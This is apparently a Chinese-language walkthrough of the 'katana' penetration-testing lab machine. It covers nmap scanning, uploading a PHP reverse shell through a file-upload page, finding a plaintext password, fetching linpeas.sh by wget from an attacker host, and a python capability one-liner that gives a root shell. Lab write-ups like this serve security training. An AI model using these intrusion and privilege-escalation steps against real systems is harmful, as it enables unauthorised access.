katana 靶机 wp
主机探活
nmap -sP 192.168.159.0/24
目标靶机IP为:192.168.159.183
端口探测
nmap -sV -p- -A 192.168.159.183
目标靶机开放端口为:21、22、80、139、445、7080、8088、8715
其中web服务的端口为:80、7080、8088、8715
web服务
分别访问这四个web服务的主页,发现其中三个内容一致,8715端口要求用户名密码
目录扫描
对这四个网站都进行目录扫描
8088端口存在有用信息
文件上传
存在上传页面,尝试上传文件
上传完成后,给出了文件路径与名称
但是当我访问这些目录时却提示不存在
这时想到了这几个页面首页都一致,会不会传到其他的服务上去了?挨个访问尝试
在8715端口下找到文件
然后上传php反弹shell脚本,本地开启端口监听
成功获得shell
提权
先大概进行信息收集的时候直接在 /home/katana
文件夹下找到了 katana 用户的登录密码。。。
katana@katana12345
但是ssh连不了,直接su切换用户
但是登陆这个用户后进行了一系列操作(sudo、计划任务等等)都没有找到任何可用信息,于是决定上传脚本探测
上传脚本
尝试了 pspy64 脚本,没有发现可用的后台运行程序,因此上传 linpeas 脚本,查看主机可能存在的可以利用的信息
wget 192.168.159.131/linpeas.sh
chmod +x linpeas.sh
探测出了一个很有可能存在漏洞的点
查找出这个的语句为:getcap -r / 2>/dev/null
python suid提权
关于 capability 能力管理可自行上网搜索,提供参考
简单来说就是比suid等更细颗粒度的权限管理手段
/usr/bin/python2.7 -c 'import os;os.setuid(0);os.system("/bin/bash")'
成功获取root权限
katana 靶机 wp相关推荐
- kb-vuln3 靶机 wp
主机发现 nmap -sP 192.168.159.0/24 目标主机IP为:192.168.159.177 端口探活 nmap -sV -p- -A 192.168.159.177 目标主机开放:2 ...
- HTB Meow靶机wp
TASK 1 首字母缩略词 VM 代表什么? VM的缩写一般是指虚拟机的意思所以答案是Virtual Machine TASK 2 我们使用什么工具与操作系统交互以启动我们的 VPN 连接? 我们在k ...
- school 靶机 wp
主机探活 nmap -sP 192.168.159.0/24 目标主机IP为:192.168.159.176 端口发现 nmap -sV -p- -A 192.168.159.176 目标主机开放:2 ...
- driftingblues 4 靶机 wp
主机探活 nmap -sP 192.168.159.0/24 目标主机IP为:192.168.159.186 端口扫描 nmap -sV -p- -A 192.168.159.186 目标靶机开放端口 ...
- driftingblues 3靶机 wp
主机探活 nmap -sP 192.168.159.0/24 目标主机IP为:192.168.159.173 端口发现 nmap -sV -p- -A 192.168.159.173 目标靶机开放端口 ...
- driftingblues靶机wp
主机探活 nmap -sP 192.168.159.0/24 端口扫描 nmap -sV -A -p- 192.168.159.155 发现只开放了 80 和 22 端口 80端口 nikto nik ...
- driftingblues 2靶机wp
主机探活 nmap -sP 192.168.159.0/24 目标主机IP为:192.168.159.165 端口发现 nmap -sP 192.168.159.0/24 开放端口为:21.22.80 ...
- Mercury 靶机 wp
主机探活 nmap -sP 192.168.159.0/24 目标主机IP为:192.168.159.180 端口发现 nmap -sV -p- -A 192.168.159.180 目标主机开放端口 ...
- 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...
- 更新wpscan_解决新版wpscan无法更新数据库问题
在做一个靶机时需要用到wpscan,然后以前学习wp漏洞的时候也有看过,但是没有强制性需要,就没管了,所以这次就想着必须给解决掉.ps:这个解决了,靶机wp马上就出来了 在网上百度了一大堆方法都不行, ...
最新文章
- 边缘检测、霍夫变换、重映射、仿射变换、直方图均衡化
- Spring MVC 4快速入门Maven原型得到了改进–更多Java 8功能
- mysql5.7 至少需要1560,mysq5.7.28配置innodb_page_size错误引起的错误1071(42000)
- CSS border-style属性
- python用于标识类方法的是_Python类的设计与使用
- php 防止造假ip攻击,php防止网站被攻击的应急代码
- 使用MyBatis后,DAO层的方法还能重载吗?
- vs2017配置pthread.h的方法
- 心海软件学心理测试系统,心海软件-心理测试、心理档案、心理咨询室管理系统...
- .net快速开发平台,learun敏捷开发框架
- 【个人笔记一】ART系统类的编译解析加载探究
- python安装numpy模块教程_python安装numpy科学计算模块
- 云和恩墨荣获阿里云云合计划2021年度优秀伙伴技术先锋奖
- 4016: 辉夜的夜空明珠(moon)
- 网页连接opc服务器,远程连接opc服务器
- dedecms图片绝对路径(附件绑定域名)的设置方法
- A problem has occurred and the system can‘t recover问题的解决
- Apache的配置与应用【Apache访问控制】以及apache日志管理【日志分割、awstats日志分析】
- 2019-TOG-Adobe-(3D Ken Burns)3D ken burns effect from a single image
- Oracle各驱动版本的区别
热门文章
- sklearn中多种编码方式——category_encoders(one-hot多种用法)
- App上实现用户手写签名保存为透明PNG格式图片
- 北京外国语大学计算机考研,北京外国语大学考研难吗?一般要什么水平才可以进入?...
- 用python解决放苹果问题_[18/11/24] 递归解决-放置苹果问题
- pacman 查询_pacman命令
- 家庭作业(贪心 + 并查集)
- 管理科学与工程 国内核心期刊 国外a刊及SCI
- 微博上看到的,小白兔系列
- 用go填写pdf模板
- vmware服务器虚拟化 pdf,VMware数据中心服务器虚拟化解决方案模板_V0.pdf